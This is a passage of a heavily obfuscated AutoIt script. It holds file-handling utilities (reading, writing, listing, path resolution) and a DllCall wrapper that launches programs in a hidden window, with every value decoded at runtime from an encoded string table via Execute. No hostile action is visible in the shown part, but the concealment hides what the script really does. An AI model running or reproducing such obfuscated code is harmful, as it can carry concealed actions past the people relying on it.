  6751. Global Const $a11e1624d1b = ($a1ed182315c - Number($a62e1725a0a))
  6752. Global Const $a1be1820119 = ($a1ed182315c - Number($a40e1922943))
  6753. Global Const $a57e1a25b4f = ($a1ed182315c - Number($a50e1b2352d))
  6754. Global Const $a49e1c2153b = ($a1ed182315c - Number($a0ce1d2422f))
  6755. Global Const $a5be1e22f13 = ($a1ed182315c - Number($a27e1f23a0e))
  6756. Global Const $a1af1024f5a = Number($a4af1122642)
  6757. Global Const $a0ff1220234 = Number($a5ef1325b63)
  6758. Global Const $a5af1423915 = Number($a3df1525c55)
  6759. Global Const $a5bf1622026 = Number($a11f1725637)
  6760. Global Const $a3af182061b = Number($a50f1924d58)
  6761. Global Const $a5cf1a24c4b = Number($a59f1b21e51)
  6762. Global Const $a57f1c22343 = Number($a0bf1d2483f)
  6763. Global Const $a4af1e22153 = Number($a0ff1f21548)
  6764. Global Const $a3b02024b3c = BitOR($a5b21a25441, $a5f21623d38, $a4af1e22153)
  6765.  
  6766. Func a3451702a61($a4302120504)
  6767.     If NOT IsDeclared("SSA3451702A61") Then
  6768.         Global $a300222150a = a2b00005424($os[6140]), $a5d0232032a = a2b00005424($os[6141]), $a3e02421852 = a2b00005424($os[6142]), $a0e02525645 = a2b00005424($os[6143]), $a4702722549 = a2b00005424($os[6144]), $a6202922010 = a2b00005424($os[6145]), $a5702a25a42 = a2b00005424($os[6146]), $a0102b2430d = a2b00005424($os[6147]), $a2f02c21211 = a2b00005424($os[6148]), $a1a02d2354b = a2b00005424($os[6149]), $a6002e23f54 = a2b00005424($os[6150]), $a5502f25f38 = a2b00005424($os[6151]), $a4c12024c06 = a2b00005424($os[6152]), $a391212100b = a2b00005424($os[6153])
  6769.         Global $ssa3451702a61 = 1
  6770.     EndIf
  6771.     Local $a28cec03a24 = FileOpen($a4302120504, $a456a602d07)
  6772.     If $a28cec03a24 = -Number($a300222150a) Then Return SetError(Number($a5d0232032a), Number($a3e02421852), Number($a0e02525645))
  6773.     Local $a3d02623646 = StringStripWS(FileRead($a28cec03a24), Number($a4702722549))
  6774.     FileClose($a28cec03a24)
  6775.     Local $a3e02824936
  6776.     If StringInStr($a3d02623646, Execute($a6202922010)) Then
  6777.         $a3e02824936 = StringSplit(StringStripCR($a3d02623646), Execute($a5702a25a42))
  6778.     ElseIf StringInStr($a3d02623646, Execute($a0102b2430d)) Then
  6779.         $a3e02824936 = StringSplit($a3d02623646, Execute($a2f02c21211))
  6780.     Else
  6781.         If StringLen($a3d02623646) Then
  6782.             Return Number($a1a02d2354b)
  6783.         Else
  6784.             Return SetError(Number($a6002e23f54), Number($a5502f25f38), Number($a4c12024c06))
  6785.         EndIf
  6786.     EndIf
  6787.     Return $a3e02824936[Number($a391212100b)]
  6788. EndFunc
  6789.  
  6790. Func a0b51804741($a4302120504)
  6791.     If NOT IsDeclared("SSA0B51804741") Then
  6792.         Global $a4812324d3f = a2b00005424($os[6154]), $a1112422d48 = a2b00005424($os[6155]), $a4a1252141b = a2b00005424($os[6156]), $a1f12622340 = a2b00005424($os[6157]), $a3f12824c20 = a2b00005424($os[6158]), $a4c12921e30 = a2b00005424($os[6159]), $a2f12a22e2e = a2b00005424($os[6160]), $a6312b21a2d = a2b00005424($os[6161]), $a5012c25d36 = a2b00005424($os[6162])
  6793.         Global $ssa0b51804741 = 1
  6794.     EndIf
  6795.     Local $a5212222407 = FileOpen($a4302120504, $a5f6aa05a32)
  6796.     If $a5212222407 = -Number($a4812324d3f) Then Return SetError(Number($a1112422d48), Number($a4a1252141b), Number($a1f12622340))
  6797.     Local $a4612725f3a = FileWrite($a5212222407, "")
  6798.     FileClose($a5212222407)
  6799.     If $a4612725f3a = -Number($a3f12824c20) Then Return SetError(Number($a4c12921e30), Number($a2f12a22e2e), Number($a6312b21a2d))
  6800.     Return Number($a5012c25d36)
  6801. EndFunc
  6802.  
  6803. Func a4f51905a55($a1992711431, $a60ff30390f = "*", $a5d8f00532a = 0)
  6804.     If NOT IsDeclared("SSA4F51905A55") Then
  6805.         Global $a5c2202372f = a2b00005424($os[6163]), $a4422120d0a = a2b00005424($os[6164]), $a6122221251 = a2b00005424($os[6165]), $a6222320300 = a2b00005424($os[6166]), $a022242435b = a2b00005424($os[6167]), $a3422520d61 = a2b00005424($os[6168]), $a6222623233 = a2b00005424($os[6169]), $a3722724210 = a2b00005424($os[6170]), $a2c22824031 = a2b00005424($os[6171]), $a1c2292490c = a2b00005424($os[6172]), $a5f22a24707 = a2b00005424($os[6173]), $a1b22b2231e = a2b00005424($os[6174]), $a3e22c21e27 = a2b00005424($os[6175]), $a3b22d23963 = a2b00005424($os[6176]), $a4022e24337 = a2b00005424($os[6177]), $a2122f23e40 = a2b00005424($os[6178]), $a053202281c = a2b00005424($os[6179]), $a5132125645 = a2b00005424($os[6180]), $a6032224809 = a2b00005424($os[6181]), $a2332324816 = a2b00005424($os[6182]), $a553242321b = a2b00005424($os[6183])
  6806.         Global $ssa4f51905a55 = 1
  6807.     EndIf
  6808.     Local $a5412d23f5d, $a177e102c17, $a6312e23b2c, $a4212f24b2c = $a5c2202372f
  6809.     $a1992711431 = StringRegExpReplace($a1992711431, $a4422120d0a, "") & $a6122221251
  6810.     If NOT FileExists($a1992711431) Then Return SetError(Number($a6222320300), Number($a022242435b), "")
  6811.     If StringRegExp($a60ff30390f, $a3422520d61) Then Return SetError(Number($a6222623233), Number($a3722724210), "")
  6812.     If NOT ($a5d8f00532a = Number($a2c22824031) OR $a5d8f00532a = Number($a1c2292490c) OR $a5d8f00532a = Number($a5f22a24707)) Then Return SetError(Number($a1b22b2231e), Number($a3e22c21e27), "")
  6813.     $a5412d23f5d = FileFindFirstFile($a1992711431 & $a60ff30390f)
  6814.     If @error Then Return SetError(Number($a3b22d23963), Number($a4022e24337), "")
  6815.     While Number($a2122f23e40)
  6816.         $a177e102c17 = FileFindNextFile($a5412d23f5d)
  6817.         If @error Then ExitLoop
  6818.         If ($a5d8f00532a + @extended = Number($a053202281c)) Then ContinueLoop
  6819.         $a6312e23b2c &= $a4212f24b2c & $a177e102c17
  6820.     WEnd
  6821.     FileClose($a5412d23f5d)
  6822.     If NOT $a6312e23b2c Then Return SetError(Number($a5132125645), Number($a6032224809), "")
  6823.     Return StringSplit(StringTrimLeft($a6312e23b2c, Number($a2332324816)), $a553242321b)
  6824. EndFunc
  6825.  
  6826. Func a2051a0131c($a4232522f25, $a3432620c51 = @SW_HIDE)
  6827.     If NOT IsDeclared("SSA2051A0131C") Then
  6828.         Global $a3a32820f4c = a2b00005424($os[6184]), $a3132923607 = a2b00005424($os[6185]), $a0532a25258 = a2b00005424($os[6186]), $a5232b21a07 = a2b00005424($os[6187]), $a5532c23615 = a2b00005424($os[6188]), $a5e32d2533d = a2b00005424($os[6189]), $a6332e24123 = a2b00005424($os[6190]), $a5032f23152 = a2b00005424($os[6191]), $a384202543a = a2b00005424($os[6192]), $a1142120538 = a2b00005424($os[6193]), $a494222093b = a2b00005424($os[6194]), $a5742324a1f = a2b00005424($os[6195]), $a3542424848 = a2b00005424($os[6196]), $a0042522a00 = a2b00005424($os[6197]), $a464262474d = a2b00005424($os[6198]), $a5142724a18 = a2b00005424($os[6199]), $a4242820d3c = a2b00005424($os[6200]), $a3342922a27 = a2b00005424($os[6201])
  6829.         Global $ssa2051a0131c = 1
  6830.     EndIf
  6831.     Local $a2232725542 = DllCall($a3a32820f4c, $a3132923607, $a0532a25258, $a5232b21a07, Number($a5532c23615), $a5e32d2533d, $a6332e24123, $a5032f23152, $a4232522f25, $a384202543a, "", $a1142120538, "", $a494222093b, $a3432620c51)
  6832.     If @error Then Return SetError(@error, @extended, Number($a5742324a1f))
  6833.     If $a2232725542[Number($a3542424848)] <= Number($a0042522a00) Then Return SetError(Number($a464262474d), $a2232725542[Number($a5142724a18)], Number($a4242820d3c))
  6834.     Return Number($a3342922a27)
  6835. EndFunc
  6836.  
  6837. Func a0b51b0625c($a4302120504, ByRef $a5e42a22a21)
  6838.     If NOT IsDeclared("SSA0B51B0625C") Then
  6839.         Global $a0c42b2313a = a2b00005424($os[6202]), $a3242c20f20 = a2b00005424($os[6203]), $a1542d20807 = a2b00005424($os[6204]), $a4542e24041 = a2b00005424($os[6205]), $a1e5202001d = a2b00005424($os[6206]), $a3452120b07 = a2b00005424($os[6207]), $a1d52224246 = a2b00005424($os[6208]), $a5b52324b2a = a2b00005424($os[6209]), $a5b52420b30 = a2b00005424($os[6210]), $a6252520000 = a2b00005424($os[6211]), $a215262580f = a2b00005424($os[6212]), $a3152725a19 = a2b00005424($os[6213]), $a4052824c57 = a2b00005424($os[6214]), $a3d52925650 = a2b00005424($os[6215]), $a0452a25a1d = a2b00005424($os[6216]), $a1e52b25221 = a2b00005424($os[6217]), $a5b52c22914 = a2b00005424($os[6218]), $a3252d22503 = a2b00005424($os[6219]), $a1952e22955 = a2b00005424($os[6220]), $a4852f21a49 = a2b00005424($os[6221])
  6840.         Global $ssa0b51b0625c = 1
  6841.     EndIf
  6842.     Local $a28cec03a24 = FileOpen($a4302120504, $a456a602d07)
  6843.     If $a28cec03a24 = -Number($a0c42b2313a) Then Return SetError(Number($a3242c20f20), Number($a1542d20807), Number($a4542e24041))
  6844.     Local $a3542f22321 = FileRead($a28cec03a24, FileGetSize($a4302120504))
  6845.     If StringRight($a3542f22321, Number($a1e5202001d)) = Execute($a3452120b07) Then $a3542f22321 = StringTrimRight($a3542f22321, Number($a1d52224246))
  6846.     If StringRight($a3542f22321, Number($a5b52324b2a)) = Execute($a5b52420b30) Then $a3542f22321 = StringTrimRight($a3542f22321, Number($a6252520000))
  6847.     FileClose($a28cec03a24)
  6848.     If StringInStr($a3542f22321, Execute($a215262580f)) Then
  6849.         $a5e42a22a21 = StringSplit(StringStripCR($a3542f22321), Execute($a3152725a19))
  6850.     ElseIf StringInStr($a3542f22321, Execute($a4052824c57)) Then
  6851.         $a5e42a22a21 = StringSplit($a3542f22321, Execute($a3d52925650))
  6852.     Else
  6853.         If StringLen($a3542f22321) Then
  6854.             Dim $a5e42a22a21[Number($a0452a25a1d)] = [Number($a1e52b25221), $a3542f22321]
  6855.         Else
  6856.             Return SetError(Number($a5b52c22914), Number($a3252d22503), Number($a1952e22955))
  6857.         EndIf
  6858.     EndIf
  6859.     Return Number($a4852f21a49)
  6860. EndFunc
  6861.  
  6862. Func a4751c0514a($a5d62020c35, $a4462122145, $a1562222c41 = 0, $a0362325112 = 0, $a2762425350 = "|")
  6863.     If NOT IsDeclared("SSA4751C0514A") Then
  6864.         Global $a3062520001 = a2b00005424($os[6222]), $a586262095f = a2b00005424($os[6223]), $a1b62723652 = a2b00005424($os[6224]), $a1362923d33 = a2b00005424($os[6225]), $a4762a23028 = a2b00005424($os[6226]), $a2162b20812 = a2b00005424($os[6227]), $a2162c22305 = a2b00005424($os[6228]), $a1b62d21b43 = a2b00005424($os[6229]), $a3f62f20e63 = a2b00005424($os[6230]), $a467202032c = a2b00005424($os[6231]), $a1572121f43 = a2b00005424($os[6232]), $a427222313e = a2b00005424($os[6233]), $a0b7232031e = a2b00005424($os[6234]), $a527242462e = a2b00005424($os[6235]), $a067252061d = a2b00005424($os[6236]), $a277262593e = a2b00005424($os[6237]), $a347282040d = a2b00005424($os[6238]), $a427292354a = a2b00005424($os[6239]), $a3d72a20e5a = a2b00005424($os[6240]), $a1d72b20440 = a2b00005424($os[6241]), $a5d72c23f49 = a2b00005424($os[6242]), $a0b72d24626 = a2b00005424($os[6243]), $a3572f23109 = a2b00005424($os[6244]), $a258212075f = a2b00005424($os[6245]), $a0182223131 = a2b00005424($os[6246]), $a0b82323e63 = a2b00005424($os[6247]), $a3f82420c58 = a2b00005424($os[6248]), $a6182520737 = a2b00005424($os[6249]), $a258262475a = a2b00005424($os[6250]), $a5b8272192b = a2b00005424($os[6251])
  6865.         Global $ssa4751c0514a = 1
  6866.     EndIf
  6867.     If NOT IsArray($a4462122145) Then Return SetError(Number($a3062520001), Number($a586262095f), Number($a1b62723652))
  6868.     Local $a0162820807 = UBound($a4462122145, Number($a1362923d33))
  6869.     If $a0162820807 > Number($a4762a23028) Then Return SetError(Number($a2162b20812), Number($a2162c22305), Number($a1b62d21b43))
  6870.     Local $a2562e23151 = UBound($a4462122145) - Number($a3f62f20e63)
  6871.     If $a0362325112 < Number($a467202032c) OR $a0362325112 > $a2562e23151 Then $a0362325112 = $a2562e23151
  6872.     If $a1562222c41 < Number($a1572121f43) OR $a1562222c41 > $a2562e23151 Then $a1562222c41 = Number($a427222313e)
  6873.     Local $a28cec03a24
  6874.     If IsString($a5d62020c35) Then
  6875.         $a28cec03a24 = FileOpen($a5d62020c35, $a5f6aa05a32)
  6876.     Else
  6877.         $a28cec03a24 = $a5d62020c35
  6878.     EndIf
  6879.     If $a28cec03a24 = -Number($a0b7232031e) Then Return SetError(Number($a527242462e), Number($a067252061d), Number($a277262593e))
  6880.     Local $a4f72720b51 = Number($a347282040d)
  6881.     Switch $a0162820807
  6882.         Case Number($a427292354a)
  6883.             For $a3040c14f22 = $a1562222c41 To $a0362325112
  6884.                 If FileWrite($a28cec03a24, $a4462122145[$a3040c14f22] & Execute($a3d72a20e5a)) = Number($a1d72b20440) Then
  6885.                     $a4f72720b51 = Number($a5d72c23f49)
  6886.                     ExitLoop
  6887.                 EndIf
  6888.             Next
  6889.         Case Number($a0b72d24626)
  6890.             Local $a5572e2044f
  6891.             For $a3040c14f22 = $a1562222c41 To $a0362325112
  6892.                 $a5572e2044f = $a4462122145[$a3040c14f22][Number($a3572f23109)]
  6893.                 For $a5d82024931 = Number($a258212075f) To $a0162820807
  6894.                     $a5572e2044f &= $a2762425350 & $a4462122145[$a3040c14f22][$a5d82024931]
  6895.                 Next
  6896.                 If FileWrite($a28cec03a24, $a5572e2044f & Execute($a0182223131)) = Number($a0b82323e63) Then
  6897.                     $a4f72720b51 = Number($a3f82420c58)
  6898.                     ExitLoop
  6899.                 EndIf
  6900.             Next
  6901.     EndSwitch
  6902.     If IsString($a5d62020c35) Then FileClose($a28cec03a24)
  6903.     If $a4f72720b51 Then Return SetError($a4f72720b51, Number($a6182520737), Number($a258262475a))
  6904.     Return Number($a5b8272192b)
  6905. EndFunc
  6906.  
  6907. Func a5c51d0363b($a628282050f, $a4a82922715, $a5d8f00532a = -1)
  6908.     If NOT IsDeclared("SSA5C51D0363B") Then
  6909.         Global $a2f82c2001c = a2b00005424($os[6252]), $a3482d22154 = a2b00005424($os[6253]), $a5482e2353a = a2b00005424($os[6254]), $a4d82f24b48 = a2b00005424($os[6255]), $a4692020613 = a2b00005424($os[6256]), $a1392223d10 = a2b00005424($os[6257]), $a5f92325f28 = a2b00005424($os[6258]), $a1d92420409 = a2b00005424($os[6259]), $a4592522d0a = a2b00005424($os[6260]), $a4192621c10 = a2b00005424($os[6261]), $a4192826203 = a2b00005424($os[6262]), $a4e92920334 = a2b00005424($os[6263]), $a4692a23d40 = a2b00005424($os[6264]), $a5e92b24917 = a2b00005424($os[6265]), $a3a92c2444b = a2b00005424($os[6266]), $a5e92d23b2f = a2b00005424($os[6267]), $a4192e24038 = a2b00005424($os[6268]), $a1b92f2364d = a2b00005424($os[6269]), $a44a2021f29 = a2b00005424($os[6270]), $a28a2123262 = a2b00005424($os[6271]), $a30a222101e = a2b00005424($os[6272])
  6910.         Global $ssa5c51d0363b = 1
  6911.     EndIf
  6912.     Local $a5212222407 = $a628282050f, $a2382a2205a = $a056a805629
  6913.     Local $a2082b20c34 = Execute($a2f82c2001c) & $a3482d22154 & Execute($a5482e2353a) & $a4d82f24b48 & Execute($a4692020613)
  6914.     Local $a029212251a = Execute($a1392223d10) & $a5f92325f28 & Execute($a1d92420409) & $a4592522d0a & Execute($a4192621c10)
  6915.     Local $a389272301b = $a2082b20c34 & $a4192826203 & $a029212251a & $a4e92920334 & $a4a82922715
  6916.     If $a5d8f00532a <> -Number($a4692a23d40) Then
  6917.         $a389272301b &= Execute($a5e92b24917) & FileRead($a628282050f)
  6918.         $a2382a2205a = $a5f6aa05a32
  6919.     EndIf
  6920.     If IsString($a628282050f) Then
  6921.         $a5212222407 = FileOpen($a628282050f, $a2382a2205a)
  6922.         If $a5212222407 = -Number($a3a92c2444b) Then
  6923.             Return SetError(Number($a5e92d23b2f), Number($a4192e24038), Number($a1b92f2364d))
  6924.         EndIf
  6925.     EndIf
  6926.     Local $a5cca403342 = FileWriteLine($a5212222407, $a389272301b)
  6927.     If IsString($a628282050f) Then
  6928.         $a5cca403342 = FileClose($a5212222407)
  6929.     EndIf
  6930.     If $a5cca403342 <= Number($a44a2021f29) Then
  6931.         Return SetError(Number($a28a2123262), $a5cca403342, Number($a30a222101e))
  6932.     EndIf
  6933.     Return $a5cca403342
  6934. EndFunc
  6935.  
  6936. Func a0351e0274d($a177e102c17, $a4ca232375c, $a09fd400f0d, $a4fa242354f = 0)
  6937.     If NOT IsDeclared("SSA0351E0274D") Then
  6938.         Global $a00a2523458 = a2b00005424($os[6273]), $a1fa2623c29 = a2b00005424($os[6274]), $a1ba2724224 = a2b00005424($os[6275]), $a1ca282190a = a2b00005424($os[6276]), $a05a2920e2d = a2b00005424($os[6277]), $a5aa2a23c2a = a2b00005424($os[6278]), $a59a2b24c49 = a2b00005424($os[6279]), $a24a2c23806 = a2b00005424($os[6280]), $a3ea2d24602 = a2b00005424($os[6281]), $a13a2e20a58 = a2b00005424($os[6282]), $a0fa2f20e3a = a2b00005424($os[6283]), $a2bb2024605 = a2b00005424($os[6284]), $a00b212150c = a2b00005424($os[6285]), $a41b2222146 = a2b00005424($os[6286]), $a59b232015e = a2b00005424($os[6287]), $a53b2622e04 = a2b00005424($os[6288]), $a2bb272021f = a2b00005424($os[6289]), $a20b2822a1c = a2b00005424($os[6290]), $a37b2922158 = a2b00005424($os[6291]), $a38b2b22662 = a2b00005424($os[6292]), $a16b2c2575e = a2b00005424($os[6293]), $a59b2d22b3d = a2b00005424($os[6294]), $a4ab2e22346 = a2b00005424($os[6295]), $a3fb2f25530 = a2b00005424($os[6296]), $a5fc2020d43 = a2b00005424($os[6297]), $a53c2123452 = a2b00005424($os[6298]), $a41c2225a45 = a2b00005424($os[6299]), $a38c2325901 = a2b00005424($os[6300]), $a62c2422239 = a2b00005424($os[6301]), $a2ac2524521 = a2b00005424($os[6302]), $a2ec2625d11 = a2b00005424($os[6303]), $a2ec2722312 = a2b00005424($os[6304]), $a4dc2825e2c = a2b00005424($os[6305])
  6939.         Global $ssa0351e0274d = 1
  6940.     EndIf
  6941.     If $a4ca232375c <= Number($a00a2523458) Then Return SetError(Number($a1fa2623c29), Number($a1ba2724224), Number($a1ca282190a))
  6942.     If NOT IsString($a09fd400f0d) Then
  6943.         $a09fd400f0d = String($a09fd400f0d)
  6944.         If $a09fd400f0d = "" Then Return SetError(Number($a05a2920e2d), Number($a5aa2a23c2a), Number($a59a2b24c49))
  6945.     EndIf
  6946.     If $a4fa242354f <> Number($a24a2c23806) AND $a4fa242354f <> Number($a3ea2d24602) Then Return SetError(Number($a13a2e20a58), Number($a0fa2f20e3a), Number($a2bb2024605))
  6947.     If NOT FileExists($a177e102c17) Then Return SetError(Number($a00b212150c), Number($a41b2222146), Number($a59b232015e))
  6948.     Local $a10b242623e = FileRead($a177e102c17)
  6949.     Local $a5fb2525137 = StringSplit(StringStripCR($a10b242623e), Execute($a53b2622e04))
  6950.     If UBound($a5fb2525137) < $a4ca232375c Then Return SetError(Number($a2bb272021f), Number($a20b2822a1c), Number($a37b2922158))
  6951.     Local $a4bb2a20308 = FileGetEncoding($a177e102c17)
  6952.     Local $a28cec03a24 = FileOpen($a177e102c17, $a4bb2a20308 + $a5f6aa05a32)
  6953.     If $a28cec03a24 = -Number($a38b2b22662) Then Return SetError(Number($a16b2c2575e), Number($a59b2d22b3d), Number($a4ab2e22346))
  6954.     $a10b242623e = ""
  6955.     For $a3800e12616 = Number($a3fb2f25530) To $a5fb2525137[Number($a5fc2020d43)]
  6956.         If $a3800e12616 = $a4ca232375c Then
  6957.             If $a4fa242354f = Number($a53c2123452) Then
  6958.                 If $a09fd400f0d <> "" Then $a10b242623e &= $a09fd400f0d & Execute($a41c2225a45)
  6959.             Else
  6960.                 $a10b242623e &= $a09fd400f0d & Execute($a38c2325901) & $a5fb2525137[$a3800e12616] & Execute($a62c2422239)
  6961.             EndIf
  6962.         ElseIf $a3800e12616 < $a5fb2525137[Number($a2ac2524521)] Then
  6963.             $a10b242623e &= $a5fb2525137[$a3800e12616] & Execute($a2ec2625d11)
  6964.         ElseIf $a3800e12616 = $a5fb2525137[Number($a2ec2722312)] Then
  6965.             $a10b242623e &= $a5fb2525137[$a3800e12616]
  6966.         EndIf
  6967.     Next
  6968.     FileWrite($a28cec03a24, $a10b242623e)
  6969.     FileClose($a28cec03a24)
  6970.     Return Number($a4dc2825e2c)
  6971. EndFunc
  6972.  
  6973. Func a4451f0041c($a2ac2920101, $a32c2a24f37 = @WorkingDir)
  6974.     If NOT IsDeclared("SSA4451F0041C") Then
  6975.         Global $a38c2b22905 = a2b00005424($os[6306]), $a12c2d20e57 = a2b00005424($os[6307]), $a3dc2e23c01 = a2b00005424($os[6308]), $a14d212381e = a2b00005424($os[6309]), $a02d2223e13 = a2b00005424($os[6310]), $a25d2322238 = a2b00005424($os[6311]), $a41d2422838 = a2b00005424($os[6312]), $a19d2520c3c = a2b00005424($os[6313]), $a14d2622440 = a2b00005424($os[6314]), $a27d272262a = a2b00005424($os[6315]), $a35d2820729 = a2b00005424($os[6316]), $a24d292335f = a2b00005424($os[6317]), $a1ed2a20c00 = a2b00005424($os[6318]), $a05d2c2190b = a2b00005424($os[6319]), $a18d2d2072c = a2b00005424($os[6320]), $a14d2e21112 = a2b00005424($os[6321]), $a0ad2f22f0b = a2b00005424($os[6322]), $a0fe202144a = a2b00005424($os[6323]), $a43e212460a = a2b00005424($os[6324]), $a1ee222442f = a2b00005424($os[6325]), $a2ae232255b = a2b00005424($os[6326]), $a05e2423c18 = a2b00005424($os[6327]), $a4ee2522b57 = a2b00005424($os[6328]), $a20e2626061 = a2b00005424($os[6329]), $a26e2721a37 = a2b00005424($os[6330]), $a2ee2825247 = a2b00005424($os[6331]), $a4ee2922e02 = a2b00005424($os[6332]), $a1be2a22f49 = a2b00005424($os[6333]), $a02e2c21402 = a2b00005424($os[6334]), $a25e2e20b27 = a2b00005424($os[6335]), $a01e2f21f16 = a2b00005424($os[6336]), $a2ff202282a = a2b00005424($os[6337]), $a39f212064b = a2b00005424($os[6338]), $a4cf2224a17 = a2b00005424($os[6339]), $a5ef2323f34 = a2b00005424($os[6340]), $a1bf2421d31 = a2b00005424($os[6341]), $a41f2520016 = a2b00005424($os[6342]), $a30f2621262 = a2b00005424($os[6343]), $a32f272442e = a2b00005424($os[6344]), $a52f2822931 = a2b00005424($os[6345]), $a26f2922540 = a2b00005424($os[6346]), $a47f2a25b27 = a2b00005424($os[6347]), $a16f2b21e21 = a2b00005424($os[6348]), $a23f2c24844 = a2b00005424($os[6349])
  6976.         Global $ssa4451f0041c = 1
  6977.     EndIf
  6978.     If NOT $a2ac2920101 OR $a2ac2920101 = $a38c2b22905 Then Return $a32c2a24f37
  6979.     Local $a48c2c22f0e = StringReplace($a2ac2920101, $a12c2d20e57, $a3dc2e23c01)
  6980.     Local Const $a59c2f25335 = $a48c2c22f0e
  6981.     Local $a1992711431
  6982.     Local $a0ad2023515 = StringLeft($a48c2c22f0e, Number($a14d212381e)) = $a02d2223e13 AND StringMid($a48c2c22f0e, Number($a25d2322238), Number($a41d2422838)) <> $a19d2520c3c
  6983.     For $a3800e12616 = Number($a14d2622440) To Number($a27d272262a)
  6984.         $a1992711431 = StringLeft($a48c2c22f0e, Number($a35d2820729))
  6985.         If $a1992711431 = $a24d292335f Then
  6986.             $a48c2c22f0e = StringTrimLeft($a48c2c22f0e, Number($a1ed2a20c00))
  6987.             Local $a53d2b22844 = StringInStr($a48c2c22f0e, $a05d2c2190b) - Number($a18d2d2072c)
  6988.             $a1992711431 = $a14d2e21112 & StringLeft($a48c2c22f0e, $a53d2b22844)
  6989.             $a48c2c22f0e = StringTrimLeft($a48c2c22f0e, $a53d2b22844)
  6990.             ExitLoop
  6991.         ElseIf StringRight($a1992711431, Number($a0ad2f22f0b)) = $a0fe202144a Then
  6992.             $a48c2c22f0e = StringTrimLeft($a48c2c22f0e, Number($a43e212460a))
  6993.             ExitLoop
  6994.         Else
  6995.             $a48c2c22f0e = $a32c2a24f37 & $a1ee222442f & $a48c2c22f0e
  6996.         EndIf
  6997.     Next
  6998.     If $a3800e12616 = Number($a2ae232255b) Then Return ""
  6999.     If StringLeft($a48c2c22f0e, Number($a05e2423c18)) <> $a4ee2522b57 Then
  7000.         If StringLeft($a59c2f25335, Number($a20e2626061)) = StringLeft($a32c2a24f37, Number($a26e2721a37)) Then
  7001.             $a48c2c22f0e = $a32c2a24f37 & $a2ee2825247 & $a48c2c22f0e
  7002.         Else
  7003.             $a48c2c22f0e = $a4ee2922e02 & $a48c2c22f0e
  7004.         EndIf
  7005.     EndIf
  7006.     Local $a1a1f512204 = StringSplit($a48c2c22f0e, $a1be2a22f49)
  7007.     Local $a45e2b22f08[$a1a1f512204[Number($a02e2c21402)]], $a44e2d2442d = Number($a25e2e20b27)
  7008.     For $a3800e12616 = Number($a01e2f21f16) To $a1a1f512204[Number($a2ff202282a)]
  7009.         If $a1a1f512204[$a3800e12616] = $a39f212064b Then
  7010.             If $a44e2d2442d Then $a44e2d2442d -= Number($a4cf2224a17)
  7011.         ElseIf NOT ($a1a1f512204[$a3800e12616] = "" AND $a3800e12616 <> $a1a1f512204[Number($a5ef2323f34)]) AND $a1a1f512204[$a3800e12616] <> $a1bf2421d31 Then
  7012.             $a45e2b22f08[$a44e2d2442d] = $a1a1f512204[$a3800e12616]
  7013.             $a44e2d2442d += Number($a41f2520016)
  7014.         EndIf
  7015.     Next
  7016.     $a48c2c22f0e = $a1992711431
  7017.     If NOT $a0ad2023515 Then
  7018.         For $a3800e12616 = Number($a30f2621262) To $a44e2d2442d - Number($a32f272442e)
  7019.             $a48c2c22f0e &= $a52f2822931 & $a45e2b22f08[$a3800e12616]
  7020.         Next
  7021.     Else
  7022.         $a48c2c22f0e &= $a59c2f25335
  7023.         If StringInStr($a48c2c22f0e, $a26f2922540) Then $a48c2c22f0e = a4451f0041c($a48c2c22f0e)
  7024.     EndIf
  7025.     While StringInStr($a48c2c22f0e, $a47f2a25b27)
  7026.         $a48c2c22f0e = StringReplace($a48c2c22f0e, $a16f2b21e21, $a23f2c24844)
  7027.     WEnd
  7028.     Return $a48c2c22f0e
  7029. EndFunc
  7030.  
  7031. Func a3361002456($a04f2d2592e, $a59f2e22b55)
  7032.     If NOT IsDeclared("SSA3361002456") Then
  7033.         Global $a18f2f22234 = a2b00005424($os[6350]), $a5d03020908 = a2b00005424($os[6351]), $a2503120b2f = a2b00005424($os[6352]), $a1103220140 = a2b00005424($os[6353]), $a5503321c63 = a2b00005424($os[6354]), $a2203421c09 = a2b00005424($os[6355]), $a470352495e = a2b00005424($os[6356]), $a5d03624010 = a2b00005424($os[6357]), $a230372302b = a2b00005424($os[6358]), $a3d0392141f = a2b00005424($os[6359]), $a0b03b26039 = a2b00005424($os[6360]), $a5a03c2305a = a2b00005424($os[6361]), $a3903d22c47 = a2b00005424($os[6362]), $a5a03e22210 = a2b00005424($os[6363]), $a4103f25923 = a2b00005424($os[6364]), $a4413023726 = a2b00005424($os[6365]), $a6013122e55 = a2b00005424($os[6366]), $a2c13321f54 = a2b00005424($os[6367]), $a3513425027 = a2b00005424($os[6368]), $a2213523a17 = a2b00005424($os[6369]), $a2e13623e10 = a2b00005424($os[6370]), $a0b13826053 = a2b00005424($os[6371]), $a331392111b = a2b00005424($os[6372]), $a0a13a25a14 = a2b00005424($os[6373]), $a5113b2281b = a2b00005424($os[6374]), $a5513c21105 = a2b00005424($os[6375]), $a2c13d20018 = a2b00005424($os[6376]), $a0713e22c1b = a2b00005424($os[6377]), $a4e13f2075c = a2b00005424($os[6378]), $a3d23023b09 = a2b00005424($os[6379]), $a4523120632 = a2b00005424($os[6380]), $a2123225503 = a2b00005424($os[6381]), $a4423323902 = a2b00005424($os[6382]), $a412342195b = a2b00005424($os[6383])
  7034.         Global $ssa3361002456 = 1
  7035.     EndIf
  7036.     If StringRight($a04f2d2592e, Number($a18f2f22234)) <> $a5d03020908 Then $a04f2d2592e &= $a2503120b2f
  7037.     If StringRight($a59f2e22b55, Number($a1103220140)) <> $a5503321c63 Then $a59f2e22b55 &= $a2203421c09
  7038.     If $a04f2d2592e = $a59f2e22b55 Then Return SetError(Number($a470352495e), Number($a5d03624010), StringTrimRight($a59f2e22b55, Number($a230372302b)))
  7039.     Local $a1d03822b0a = StringSplit($a04f2d2592e, $a3d0392141f)
  7040.     Local $a1f03a2610f = StringSplit($a59f2e22b55, $a0b03b26039)
  7041.     If $a1d03822b0a[Number($a5a03c2305a)] <> $a1f03a2610f[Number($a3903d22c47)] Then Return SetError(Number($a5a03e22210), Number($a4103f25923), StringTrimRight($a59f2e22b55, Number($a4413023726)))
  7042.     Local $a3800e12616 = Number($a6013122e55)
  7043.     Local $a3a13220f40 = Number($a2c13321f54)
  7044.     While Number($a3513425027)
  7045.         If $a1d03822b0a[$a3800e12616] <> $a1f03a2610f[$a3800e12616] Then
  7046.             $a3a13220f40 = $a3800e12616
  7047.             ExitLoop
  7048.         EndIf
  7049.         $a3800e12616 += Number($a2213523a17)
  7050.     WEnd
  7051.     $a3800e12616 = Number($a2e13623e10)
  7052.     Local $a1813723b32 = ""
  7053.     For $a44e2d2442d = Number($a0b13826053) To $a1f03a2610f[Number($a331392111b)]
